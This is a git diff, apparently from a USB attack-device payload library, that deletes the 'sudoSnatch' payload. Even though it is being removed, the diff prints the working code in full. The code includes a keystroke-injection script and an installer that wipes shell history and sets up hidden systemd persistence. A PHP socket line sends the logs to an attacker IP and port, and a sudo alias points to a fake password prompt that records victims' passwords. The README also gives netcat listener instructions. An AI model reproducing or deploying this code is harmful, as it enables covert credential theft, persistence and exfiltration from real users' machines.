deleting sudoSnatch

payloads/library/credentials/sudoSnatch/README.md

@@ -1,48 +0,0 @@
-## About:
-* Title: sudoSnatch
-* Description: sudoSnatch grabs plain text passwords remotely/locally.
-* AUTHOR: drapl0n
-* Version: 1.0
-* Category: Credentials
-* Target: Unix-like operating systems with systemd.
-* Attackmodes: HID, Storage
-
-## sudoSnatch: sudoSnatch payload grabs sudo password in plain text(imediately after victim uses `sudo` command) and sends it back to attacker remotely/locally.
-
-### Features:
-* Plain text passwords.
-* Detailed password logs.
-* Persistent
-* Autostart payload on boot.
-
-### Workflow:
-* Injecting payload on target's system.
-* Checks whether internet is connected to the target system. 
-* If internet is connected then it sends clear text passwords to attacker. 
-
-### Changes to be made in payload.sh:
-* Replace ip(0.0.0.0) and port number(4444) with your servers ip address and port number on line no `10`.
-* Increase/Decrease time interval to restart service periodically (Default is 15 mins), on line no `14`.
-
-### LED Status:
-* `SETUP`   : MAGENTA
-* `ATTACK`  : YELLOW
-* `FINISH`  : GREEN
-
-### Directory Structure of payload components:
-| FileName       | Directory                     |
-| -------------- | ----------------------------- |
-| payload.txt    | /payloads/switch1/            |
-| payload.sh     | /payloads/                    |
-| shell          | /payloads/library/sudoSnatch/ |
-| systemMgr      | /payloads/library/sudoSnatch/ |
-
-* Note: Create directory named `sudoSnatch` in `/payloads/library/`
-### Usage:
-1.  Inject payload into target's system.
-2. Start netcat listner on attacking system:
-
-* `nc -l -p <port number>` use this command to fetch passwords.
-
-#### Support me if you like my work:
-* https://twitter.com/drapl0n 

payloads/library/credentials/sudoSnatch/payload.sh

@@ -1,23 +0,0 @@
-#!/bin/bash
-unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
-mkdir /var/tmp/.system
-lol=$(lsblk | grep 1.8G)
-disk=$(echo $lol | awk '{print $1}')
-mntt=$(lsblk | grep $disk | awk '{print $7}')
-cp -r $mntt/payloads/library/sudoSnatch/systemMgr /var/tmp/.system/
-chmod +x /var/tmp/.system/systemMgr
-touch /var/tmp/.system/sysLog
-echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"cat /var/tmp/.system/sysLog "<&3 >&3 2>&3"\"");'\n\tfi\ndone" >  /var/tmp/.system/systemBus
-chmod +x /var/tmp/.system/systemBus
-mkdir -p ~/.config/systemd/user
-echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service
-echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
-chmod +x /var/tmp/.system/reboot
-echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/reboot.service
-systemctl --user daemon-reload
-systemctl --user enable --now systemBUS.service
-systemctl --user start --now systemBUS.service
-systemctl --user enable --now reboot.service
-systemctl --user start --now reboot.service
-cp -r $mntt/payloads/library/sudoSnatch/shell /tmp/
-chmod +x /tmp/shell && /tmp/./shell && rm /tmp/shell

payloads/library/credentials/sudoSnatch/payload.txt

@@ -1,56 +0,0 @@
-# Title: sudoSnatch
-# Description: sudoSnatch grabs plain text passwords remotely/locally.
-# AUTHOR: drapl0n
-# Version: 1.0
-# Category: Credentials
-# Target: Unix-like operating systems with systemd.
-# Attackmodes: HID, Storage
-
-LED SETUP
-ATTACKMODE STORAGE HID
-GET SWITCH_POSITION
-LED ATTACK
-Q DELAY 1000
-Q CTRL-ALT t
-Q DELAY 1000
-
-# [Prevent storing history]
-Q STRING unset HISTFILE
-Q ENTER
-Q DELAY 200
-
-# [Fetching BashBunny's block device]
-Q STRING lol='$(lsblk | grep 1.8G)'
-Q ENTER
-Q DELAY 100
-Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
-Q ENTER
-Q DELAY 200
-
-# [Mounting BashBunny]
-Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
-Q ENTER
-Q DELAY 1400
-Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
-Q ENTER
-Q DELAY 200
-
-# [transfering payload script]
-Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/
-Q ENTER
-Q STRING chmod +x /tmp/payload.sh
-Q ENTER
-Q STRING /tmp/./payload.sh
-Q ENTER
-Q DELAY 5000
-Q STRING rm /tmp/payload.sh
-Q ENTER
-Q DELAY 500
-
-# [Unmounting BashBunny]
-Q STRING udisksctl unmount -b /dev/'$disk'
-Q ENTER
-Q DELAY 500
-Q STRING exit
-Q ENTER
-LED FINISH

payloads/library/credentials/sudoSnatch/shell

@@ -1,12 +0,0 @@
-#!/bin/bash
-ls -a ~/ | grep 'zshrc' &> /dev/null
-if [ $? = 0 ]; then
-	echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.zshrc
-        echo "systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service" >> ~/.zshrc
-fi
-
-ls -a ~/ | grep 'bashrc' &> /dev/null
-if [ $? = 0 ]; then
-	echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.bashrc
-        echo "systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service" >> ~/.bashrc
-fi

payloads/library/credentials/sudoSnatch/systemMgr

@@ -1,5 +0,0 @@
-#!/bin/bash
-echo -n "[sudo] password for $(whoami):"
-IFS="" read -s pass
-echo -e "Timestamp=[$(date)] \t User=[$(whoami)] \t  Password=[$pass]" >> /var/tmp/.system/sysLog
-echo -e "\nSorry, try again."